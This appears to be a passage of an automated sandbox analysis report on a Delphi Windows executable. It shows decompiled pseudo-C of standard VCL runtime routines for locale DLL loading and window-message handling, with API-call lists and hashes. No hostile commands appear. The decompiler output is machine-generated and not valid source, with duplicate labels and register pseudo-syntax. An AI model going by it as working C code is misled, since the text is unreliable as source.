                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1759228003-2375825460
                                                                        • Opcode ID: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction ID: 04e7f70bc9d5a93712b3d4866678576dafef9722c20d67039ec14452820f7b6a
                                                                        • Opcode Fuzzy Hash: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction Fuzzy Hash: D2516D71A4060C7AFB21D6A4CC46FEFBAACDB04744F5041B7BA44F65C1E6789E448FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00455880, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E00455880(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x455f10);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E00455734(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E004577D8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E004557F8(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0045647C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00456420(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044D7A0(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00456960(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043CC2C(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043CC2C(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043CC2C(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x47aaf4 = 0;
											_t206 = GetFocus();
											SetFocus(E0043CC2C(_t367));
											E00437760(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x47aaf4 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E004562F8(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E00455F74(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E00456024(_v8);
								} else {
									E004557F8(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E00455F58(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BBC8("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x496c08; // 0x215094c
							E00454D9C(_t267);
							E004557F8(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x495bf8; // 0x496b6c
							E00441478( *_t271, _t312,  *(_v12 + 4));
							E0045578C(_v8, _t303, _t312, _v12, _t365);
							E004557F8(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E004557F8(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E00455688();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00455698(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M00455924))) {
						case 0:
							__eax = E0041C0B0();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L004070E4();
							__eax = E004557F8(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E004557F8(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044D650( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00455690();
							} else {
								_v8 = E00455698(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E004557F8(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00407044();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E004557F8(__ebp);
							} else {
								__eax = E00455834(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00453004(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E004557F8(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E00414208( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}





















































                                                                        0x00455880
                                                                        0x00455887
                                                                        0x00455889
                                                                        0x0045588c
                                                                        0x00455891
                                                                        0x00455892
                                                                        0x00455897
                                                                        0x0045589a
                                                                        0x004558a2
                                                                        0x004558b1
                                                                        0x004558b4
                                                                        0x004558e8
                                                                        0x004558ee
                                                                        0x004558f6
                                                                        0x004558f8
                                                                        0x004558fa
                                                                        0x004558fd
                                                                        0x004559b1
                                                                        0x004559b6
                                                                        0x004559fc
                                                                        0x00455a01
                                                                        0x00455a22
                                                                        0x00455a22
                                                                        0x00455a27
                                                                        0x00455e94
                                                                        0x00455e97
                                                                        0x00455e9b
                                                                        0x00455eb7
                                                                        0x00455e9d
                                                                        0x00455ea9
                                                                        0x00455ea9
                                                                        0x00455f06
                                                                        0x00455f06
                                                                        0x00455f08
                                                                        0x00455f0b
                                                                        0x00000000
                                                                        0x00455f0b
                                                                        0x00455a30
                                                                        0x00455a33
                                                                        0x00455cf2
                                                                        0x00455a39
                                                                        0x00455eff
                                                                        0x00455f00
                                                                        0x00455f05
                                                                        0x00000000
                                                                        0x00455a33
                                                                        0x00455a03
                                                                        0x00455e5e
                                                                        0x00455e61
                                                                        0x00455e65
                                                                        0x00455e8d
                                                                        0x00455e67
                                                                        0x00455e75
                                                                        0x00455e75
                                                                        0x00000000
                                                                        0x00455e65
                                                                        0x00455a09
                                                                        0x00455a09
                                                                        0x00455a0e
                                                                        0x00455e0c
                                                                        0x00455e11
                                                                        0x00455e13
                                                                        0x00455e19
                                                                        0x00455e1e
                                                                        0x00455e21
                                                                        0x00455e24
                                                                        0x00455e2c
                                                                        0x00455e31
                                                                        0x00455e33
                                                                        0x00455e3a
                                                                        0x00455e3a
                                                                        0x00455e33
                                                                        0x00455e24
                                                                        0x00000000
                                                                        0x00455e13
                                                                        0x00455a14
                                                                        0x00455a17
                                                                        0x00455e44
                                                                        0x00455e54
                                                                        0x00000000
                                                                        0x00455a1d
                                                                        0x00000000
                                                                        0x00455a1d
                                                                        0x00455a17
                                                                        0x004559b8
                                                                        0x00455d1f
                                                                        0x00455d22
                                                                        0x00455d24
                                                                        0x00455d2a
                                                                        0x00455d2e
                                                                        0x00455d33
                                                                        0x00455d35
                                                                        0x00455d43
                                                                        0x00455d48
                                                                        0x00455d4a
                                                                        0x00455d58
                                                                        0x00455d5d
                                                                        0x00455d5f
                                                                        0x00455d65
                                                                        0x00455d6c
                                                                        0x00455d7b
                                                                        0x00455d94
                                                                        0x00455d9a
                                                                        0x00455d9f
                                                                        0x00455da9
                                                                        0x00455da9
                                                                        0x00455d5f
                                                                        0x00455d4a
                                                                        0x00455d35
                                                                        0x00000000
                                                                        0x00455d24
                                                                        0x004559be
                                                                        0x004559c3
                                                                        0x004559e3
                                                                        0x004559e3
                                                                        0x004559e8
                                                                        0x00455ddd
                                                                        0x00455de0
                                                                        0x00455de8
                                                                        0x00455dfa
                                                                        0x00455dfa
                                                                        0x00000000
                                                                        0x00455de8
                                                                        0x004559ee
                                                                        0x004559f1
                                                                        0x00455d00
                                                                        0x00455d05
                                                                        0x00455d07
                                                                        0x00455d10
                                                                        0x00455d10
                                                                        0x00000000
                                                                        0x004559f7
                                                                        0x00000000
                                                                        0x004559f7
                                                                        0x004559f1
                                                                        0x004559c5
                                                                        0x00455db5
                                                                        0x00455db8
                                                                        0x00455dc0
                                                                        0x00455dd2
                                                                        0x00455dd2
                                                                        0x00000000
                                                                        0x00455dc0
                                                                        0x004559cb
                                                                        0x004559cb
                                                                        0x004559d0
                                                                        0x00455a49
                                                                        0x00455a49
                                                                        0x00455a4e
                                                                        0x00455a5c
                                                                        0x00455a50
                                                                        0x00455a50
                                                                        0x00455a55
                                                                        0x00455a69
                                                                        0x00455a57
                                                                        0x00455a74
                                                                        0x00455a79
                                                                        0x00455a55
                                                                        0x00000000
                                                                        0x00455a4e
                                                                        0x004559d5
                                                                        0x004559d8
                                                                        0x00455c01
                                                                        0x00000000
                                                                        0x004559de
                                                                        0x00000000
                                                                        0x004559de
                                                                        0x004559d8
                                                                        0x00455903
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455909
                                                                        0x0045590c
                                                                        0x00455978
                                                                        0x0045597b
                                                                        0x0045599a
                                                                        0x0045599a
                                                                        0x0045599d
                                                                        0x00455adf
                                                                        0x00000000
                                                                        0x00455adf
                                                                        0x004559a3
                                                                        0x004559a6
                                                                        0x00455c25
                                                                        0x00455c2b
                                                                        0x00455c31
                                                                        0x00455c37
                                                                        0x00455c3a
                                                                        0x00455c41
                                                                        0x00455c47
                                                                        0x00455c4a
                                                                        0x00455c51
                                                                        0x00455cd1
                                                                        0x00455c53
                                                                        0x00455c62
                                                                        0x00455c67
                                                                        0x00455c6d
                                                                        0x00455c6f
                                                                        0x00455cb9
                                                                        0x00455cc1
                                                                        0x00455c71
                                                                        0x00455c76
                                                                        0x00455c8d
                                                                        0x00455c8f
                                                                        0x00455c91
                                                                        0x00455c93
                                                                        0x00455c9c
                                                                        0x00455caa
                                                                        0x00455caa
                                                                        0x00455c93
                                                                        0x00455c6f
                                                                        0x00455c51
                                                                        0x00455c41
                                                                        0x00000000
                                                                        0x004559ac
                                                                        0x00000000
                                                                        0x004559ac
                                                                        0x004559a6
                                                                        0x0045597d
                                                                        0x00455ee5
                                                                        0x00455eea
                                                                        0x00455ef0
                                                                        0x00000000
                                                                        0x00455ef5
                                                                        0x00455983
                                                                        0x00455983
                                                                        0x00455986
                                                                        0x00455ec5
                                                                        0x00455ecc
                                                                        0x00455ed7
                                                                        0x00455edd
                                                                        0x00000000
                                                                        0x00455ee2
                                                                        0x0045598c
                                                                        0x0045598f
                                                                        0x00455b09
                                                                        0x00455b0f
                                                                        0x00455b12
                                                                        0x00455b16
                                                                        0x00455b1c
                                                                        0x00455b22
                                                                        0x00455b25
                                                                        0x00455b29
                                                                        0x00455b50
                                                                        0x00455b65
                                                                        0x00455b2b
                                                                        0x00455b2e
                                                                        0x00455b43
                                                                        0x00455b43
                                                                        0x00000000
                                                                        0x00455995
                                                                        0x00000000
                                                                        0x00455995
                                                                        0x0045598f
                                                                        0x0045590e
                                                                        0x00455c09
                                                                        0x00455c0c
                                                                        0x00455c10
                                                                        0x00455c19
                                                                        0x00455c19
                                                                        0x00000000
                                                                        0x00455c10
                                                                        0x00455914
                                                                        0x00455917
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045591d
                                                                        0x00000000
                                                                        0x00455ef8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455ae7
                                                                        0x00455ae9
                                                                        0x00455aeb
                                                                        0x00455af3
                                                                        0x00455af6
                                                                        0x00455af7
                                                                        0x00455afd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455b6f
                                                                        0x00455b72
                                                                        0x00455b76
                                                                        0x00455baa
                                                                        0x00455bb0
                                                                        0x00455bb3
                                                                        0x00455bba
                                                                        0x00455bbc
                                                                        0x00455bbf
                                                                        0x00455bc2
                                                                        0x00455bc7
                                                                        0x00455bca
                                                                        0x00455bca
                                                                        0x00455bd3
                                                                        0x00455b78
                                                                        0x00455b7b
                                                                        0x00455b80
                                                                        0x00455b83
                                                                        0x00455b89
                                                                        0x00455b8b
                                                                        0x00455b92
                                                                        0x00455b95
                                                                        0x00455b95
                                                                        0x00455b97
                                                                        0x00455b97
                                                                        0x00455b9e
                                                                        0x00455ba3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455a97
                                                                        0x00455a9a
                                                                        0x00455a9d
                                                                        0x00455a9e
                                                                        0x00455aa3
                                                                        0x00455aa5
                                                                        0x00455ab4
                                                                        0x00455aa7
                                                                        0x00455aa8
                                                                        0x00455aad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455a7f
                                                                        0x00455a82
                                                                        0x00455a85
                                                                        0x00455a87
                                                                        0x00455a8d
                                                                        0x00455a8d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00455abf
                                                                        0x00455ac2
                                                                        0x00455ac9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004558b6
                                                                        0x004558b6
                                                                        0x004558b7
                                                                        0x00000000
                                                                        0x004558b9
                                                                        0x004558d5
                                                                        0x00000000
                                                                        0x004558d7
                                                                        0x004558d7
                                                                        0x004558d9
                                                                        0x004558dc
                                                                        0x004558dc
                                                                        0x00455f25
                                                                        0x00455f2b
                                                                        0x004558e4
                                                                        0x004558e4
                                                                        0x004558e5
                                                                        0x004558e5
                                                                        0x004558e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004558e6

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RegisterAutomation$lkI$vcltest3.dll
                                                                        • API String ID: 0-607161752
                                                                        • Opcode ID: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction ID: f2d9504c2ba57309c7552e980363ea0a8989d55f74f96697af3e275cc6580183
                                                                        • Opcode Fuzzy Hash: e7a79aa871f1fbd69609875c6ded9006c70b9e62cc30c7898b5dd607c31d3f82
                                                                        • Instruction Fuzzy Hash: D9E1AD31A00A05DFDB10DB69C595A6EB7F1AF08311F2881A6FD059B363D738EE49DB09
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405DAC, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E00405DAC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401338();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401340();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401338();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401338();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401338();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                        0x00405dac
                                                                        0x00405db4
                                                                        0x00405dbb
                                                                        0x00405dbc
                                                                        0x00405dcf
                                                                        0x00405dd4
                                                                        0x00405ddd
                                                                        0x00405ec6
                                                                        0x00405ecd
                                                                        0x00405df3
                                                                        0x00405df3
                                                                        0x00405df9
                                                                        0x00405dfa
                                                                        0x00405e07
                                                                        0x00405e0c
                                                                        0x00405e0f
                                                                        0x00405e0b
                                                                        0x00000000
                                                                        0x00405e0b
                                                                        0x00405e1b
                                                                        0x00405e23
                                                                        0x00405e29
                                                                        0x00405e2e
                                                                        0x00405e3b
                                                                        0x00405e3f
                                                                        0x00405e40
                                                                        0x00405e41
                                                                        0x00405e56
                                                                        0x00405e56
                                                                        0x00405e5a
                                                                        0x00405e73
                                                                        0x00405e77
                                                                        0x00405e78
                                                                        0x00405e79
                                                                        0x00405e89
                                                                        0x00405e8e
                                                                        0x00405e92
                                                                        0x00405e94
                                                                        0x00405ea9
                                                                        0x00405ead
                                                                        0x00405eae
                                                                        0x00405eaf
                                                                        0x00405ebf
                                                                        0x00405ec4
                                                                        0x00405ec4
                                                                        0x00405e92
                                                                        0x00405e5a
                                                                        0x00000000
                                                                        0x00405e23

                                                                        APIs
                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
